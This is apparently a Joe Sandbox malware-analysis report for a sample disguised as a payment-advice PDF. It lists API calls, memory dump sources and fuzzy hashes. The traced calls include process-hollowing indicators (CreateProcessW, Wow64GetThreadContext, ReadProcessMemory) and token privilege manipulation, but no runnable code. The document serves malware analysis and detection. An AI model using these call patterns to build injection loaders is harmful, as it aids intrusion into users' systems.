                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID: EA06
                                                              • API String ID: 4104443479-3962188686
                                                              • Opcode ID: 79e7ca0da52c343bebe4327b4528c2defb0eb297d2668e2091ebfe515cd80c0c
                                                              • Instruction ID: 9a2d7a6e4a000803421ab5e5858b4a521d0cccf8731275a4fc8fc5b99537ea21
                                                              • Opcode Fuzzy Hash: 79e7ca0da52c343bebe4327b4528c2defb0eb297d2668e2091ebfe515cd80c0c
                                                              • Instruction Fuzzy Hash: 8B416B21E0425C6BDF219B6888917BE7FB2FF45304F286475FC86DB286D6349D4483A3
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID:
                                                              • API String ID: 4104443479-0
                                                              • Opcode ID: 9dd4efb868ffb8a5767105da0b16a8b73f80e319b4c4c742e2df27cd6dceb9ed
                                                              • Instruction ID: 0caa243640cfb5b454e8f568b732e80434d93c04a1cb4a9169b9391906c4c8e6
                                                              • Opcode Fuzzy Hash: 9dd4efb868ffb8a5767105da0b16a8b73f80e319b4c4c742e2df27cd6dceb9ed
                                                              • Instruction Fuzzy Hash: 4031C5B160461AAFC704DF68C8D1E6DF3A9FF483247158629E519CB391EB30ED20CB90
                                                              APIs
                                                              • IsThemeActive.UXTHEME ref: 00844834
                                                                • Part of subcall function 0086336C: __lock.LIBCMT ref: 00863372
                                                                • Part of subcall function 0086336C: DecodePointer.KERNEL32(00000001,?,00844849,00897C74), ref: 0086337E
                                                                • Part of subcall function 0086336C: EncodePointer.KERNEL32(?,?,00844849,00897C74), ref: 00863389
                                                                • Part of subcall function 008448FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00844915
                                                                • Part of subcall function 008448FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0084492A
                                                                • Part of subcall function 00843B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00843B68
                                                                • Part of subcall function 00843B3A: IsDebuggerPresent.KERNEL32 ref: 00843B7A
                                                                • Part of subcall function 00843B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,009052F8,009052E0,?,?), ref: 00843BEB
                                                                • Part of subcall function 00843B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00843C6F
                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00844874
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                              • String ID:
                                                              • API String ID: 1438897964-0
                                                              • Opcode ID: b88a2abc1456f19a6cec4fe62678e063f1d19fd1329728bb48c988758aacee5c
                                                              • Instruction ID: cb1adeb94debf2af9e159cbb5b1f80aead39a0ba0a2fb39cef4b7279690e0c0a
                                                              • Opcode Fuzzy Hash: b88a2abc1456f19a6cec4fe62678e063f1d19fd1329728bb48c988758aacee5c
                                                              • Instruction Fuzzy Hash: 0C116A719183499FD700EF2CE84590ABBE8FF85750F11452AF090C32B1DB709A44CB92
                                                              APIs
                                                                • Part of subcall function 0086571C: __FF_MSGBANNER.LIBCMT ref: 00865733
                                                                • Part of subcall function 0086571C: __NMSG_WRITE.LIBCMT ref: 0086573A
                                                                • Part of subcall function 0086571C: RtlAllocateHeap.NTDLL(01610000,00000000,00000001,00000000,?,?,?,00860DD3,?), ref: 0086575F
                                                              • std::exception::exception.LIBCMT ref: 00860DEC
                                                              • __CxxThrowException@8.LIBCMT ref: 00860E01
                                                                • Part of subcall function 0086859B: RaiseException.KERNEL32(?,?,?,008F9E78,00000000,?,?,?,?,00860E06,?,008F9E78,?,00000001), ref: 008685F0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 3902256705-0
                                                              • Opcode ID: 3dfd91c47e6631e754ccf186db13e24f2619d5e0e0592af0980c74f13e768d53
                                                              • Instruction ID: 4c0076de8b2a732a44e3aa22d115ee4491dde670ca216d4f47c0bb8ce6981355
                                                              • Opcode Fuzzy Hash: 3dfd91c47e6631e754ccf186db13e24f2619d5e0e0592af0980c74f13e768d53
                                                              • Instruction Fuzzy Hash: FAF0A43550021DA6CB10BAE8EC06ADF7BADFF11351F110666F918E6281DFB19A448ADA
                                                              APIs
                                                                • Part of subcall function 00868B28: __getptd_noexit.LIBCMT ref: 00868B28
                                                              • __lock_file.LIBCMT ref: 008653EB
                                                                • Part of subcall function 00866C11: __lock.LIBCMT ref: 00866C34
                                                              • __fclose_nolock.LIBCMT ref: 008653F6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                              • String ID:
                                                              • API String ID: 2800547568-0
                                                              • Opcode ID: 4aa586414f18bd1c14eac8ca5f5e3accad81a78e0c904a4018e398f05063a803
                                                              • Instruction ID: 268d763ba8189e4de914a211bd55c4be475c8e3ca8134204bd042c71bba7c4ff
                                                              • Opcode Fuzzy Hash: 4aa586414f18bd1c14eac8ca5f5e3accad81a78e0c904a4018e398f05063a803
                                                              • Instruction Fuzzy Hash: DBF09671800A04DADB106F7D99027AD7AA0FF42774F238309A428EB3C1CFBC49419B53
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 016549BB
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01654A51
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01654A73
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281658445.0000000001652000.00000040.00000020.00020000.00000000.sdmp, Offset: 01652000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1652000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID:
                                                              • API String ID: 4104443479-0
                                                              APIs
                                                                • Part of subcall function 00844BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00844BEF
                                                                • Part of subcall function 0086525B: __wfsopen.LIBCMT ref: 00865266
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00844E0F
                                                                • Part of subcall function 00844B6A: FreeLibrary.KERNEL32(00000000), ref: 00844BA4
                                                                • Part of subcall function 00844C70: _memmove.LIBCMT ref: 00844CBA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Library$Free$Load__wfsopen_memmove
                                                              • String ID:
                                                              • API String ID: 1396898556-0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              APIs
                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008607B0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: LongNamePath
                                                              • String ID:
                                                              • API String ID: 82841172-0
                                                              APIs
                                                              • __lock_file.LIBCMT ref: 008648A6
                                                                • Part of subcall function 00868B28: __getptd_noexit.LIBCMT ref: 00868B28
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit__lock_file
                                                              • String ID:
                                                              • API String ID: 2597487223-0
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,?,009052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00844E7E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              APIs
                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008607B0
                                                                • Part of subcall function 00847BCC: _memmove.LIBCMT ref: 00847C06
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: LongNamePath_memmove
                                                              • String ID:
                                                              • API String ID: 2514874351-0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __wfsopen
                                                              • String ID:
                                                              • API String ID: 197181222-0
                                                              APIs
                                                              • Sleep.KERNELBASE(000001F4), ref: 01655211
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281658445.0000000001652000.00000040.00000020.00020000.00000000.sdmp, Offset: 01652000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1652000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              APIs
                                                                • Part of subcall function 00842612: GetWindowLongW.USER32(?,000000EB), ref: 00842623
                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 008CCB37
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008CCB95
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 008CCBD6
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008CCC00
                                                              • SendMessageW.USER32 ref: 008CCC29
                                                              • _wcsncpy.LIBCMT ref: 008CCC95
                                                              • GetKeyState.USER32(00000011), ref: 008CCCB6
                                                              • GetKeyState.USER32(00000009), ref: 008CCCC3
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008CCCD9
                                                              • GetKeyState.USER32(00000010), ref: 008CCCE3
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008CCD0C
                                                              • SendMessageW.USER32 ref: 008CCD33
                                                              • SendMessageW.USER32(?,00001030,?,008CB348), ref: 008CCE37
                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 008CCE4D
                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 008CCE60
                                                              • SetCapture.USER32(?), ref: 008CCE69
                                                              • ClientToScreen.USER32(?,?), ref: 008CCECE
                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 008CCEDB
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008CCEF5
                                                              • ReleaseCapture.USER32 ref: 008CCF00
                                                              • GetCursorPos.USER32(?), ref: 008CCF3A
                                                              • ScreenToClient.USER32(?,?), ref: 008CCF47
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 008CCFA3
                                                              • SendMessageW.USER32 ref: 008CCFD1
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 008CD00E
                                                              • SendMessageW.USER32 ref: 008CD03D
                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 008CD05E
                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 008CD06D
                                                              • GetCursorPos.USER32(?), ref: 008CD08D
                                                              • ScreenToClient.USER32(?,?), ref: 008CD09A
                                                              • GetParent.USER32(?), ref: 008CD0BA
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 008CD123
                                                              • SendMessageW.USER32 ref: 008CD154
                                                              • ClientToScreen.USER32(?,?), ref: 008CD1B2
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 008CD1E2
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 008CD20C
                                                              • SendMessageW.USER32 ref: 008CD22F
                                                              • ClientToScreen.USER32(?,?), ref: 008CD281
                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 008CD2B5
                                                                • Part of subcall function 008425DB: GetWindowLongW.USER32(?,000000EB), ref: 008425EC
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 008CD351
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                              • String ID: @GUI_DRAGID$F
                                                              • API String ID: 3977979337-4164748364
                                                              • Opcode ID: be274c1a33b4958842ed1cd6210274c2cf850dff7af831819cb4663140461478
                                                              • Instruction ID: a1bde3fd3313fc9984a8bda12eb4c29dc8a6c287476b4098c96f251321339f47
                                                              • Opcode Fuzzy Hash: be274c1a33b4958842ed1cd6210274c2cf850dff7af831819cb4663140461478
                                                              • Instruction Fuzzy Hash: 88426774208641AFDB249F68C849FAABBF5FF49320F14452DFA99C72A1D731D840DB52
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memmove$_memset
                                                              • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                              • API String ID: 1357608183-1798697756
                                                              • Opcode ID: 2b0f46f4229420284ea161b7e5f416254ef647adb7ad48a620848f488753cff8
                                                              • Instruction ID: 022afbcdb5159ae40d922725734860aa8fe9881a3a2b5a55d7e7549dd6344295
                                                              • Opcode Fuzzy Hash: 2b0f46f4229420284ea161b7e5f416254ef647adb7ad48a620848f488753cff8
                                                              • Instruction Fuzzy Hash: 2A93AF75A04219DFDF24DF98D881BADB7B1FF48314F29816AE945EB281E7709E81CB40
                                                              APIs
                                                              • GetForegroundWindow.USER32(00000000,?), ref: 008448DF
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0087D665
                                                              • IsIconic.USER32(?), ref: 0087D66E
                                                              • ShowWindow.USER32(?,00000009), ref: 0087D67B
                                                              • SetForegroundWindow.USER32(?), ref: 0087D685
                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0087D69B
                                                              • GetCurrentThreadId.KERNEL32 ref: 0087D6A2
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0087D6AE
                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0087D6BF
                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0087D6C7
                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 0087D6CF
                                                              • SetForegroundWindow.USER32(?), ref: 0087D6D2
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0087D6E7
                                                              • keybd_event.USER32(00000012,00000000), ref: 0087D6F2
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0087D6FC
                                                              • keybd_event.USER32(00000012,00000000), ref: 0087D701
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0087D70A
                                                              • keybd_event.USER32(00000012,00000000), ref: 0087D70F
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0087D719
                                                              • keybd_event.USER32(00000012,00000000), ref: 0087D71E
                                                              • SetForegroundWindow.USER32(?), ref: 0087D721
                                                              • AttachThreadInput.USER32(?,?,00000000), ref: 0087D748
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 4125248594-2988720461
                                                              • Opcode ID: 1b2ac5ae4b7d9b5b9d126248f5997ba50ed29492233d3877b240dd95e904712a
                                                              • Instruction ID: fdfad92489920555db978db7de6151013c64352e838dfbb2a8e2af12f8b386e1
                                                              • Opcode Fuzzy Hash: 1b2ac5ae4b7d9b5b9d126248f5997ba50ed29492233d3877b240dd95e904712a
                                                              • Instruction Fuzzy Hash: 1F315571A40318BBFB215B619C49F7F7E7DFF44B50F108025FB09EA1D1D6B09911AAA1
                                                              APIs
                                                                • Part of subcall function 008987E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0089882B
                                                                • Part of subcall function 008987E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00898858
                                                                • Part of subcall function 008987E1: GetLastError.KERNEL32 ref: 00898865
                                                              • _memset.LIBCMT ref: 00898353
                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008983A5
                                                              • CloseHandle.KERNEL32(?), ref: 008983B6
                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008983CD
                                                              • GetProcessWindowStation.USER32 ref: 008983E6
                                                              • SetProcessWindowStation.USER32(00000000), ref: 008983F0
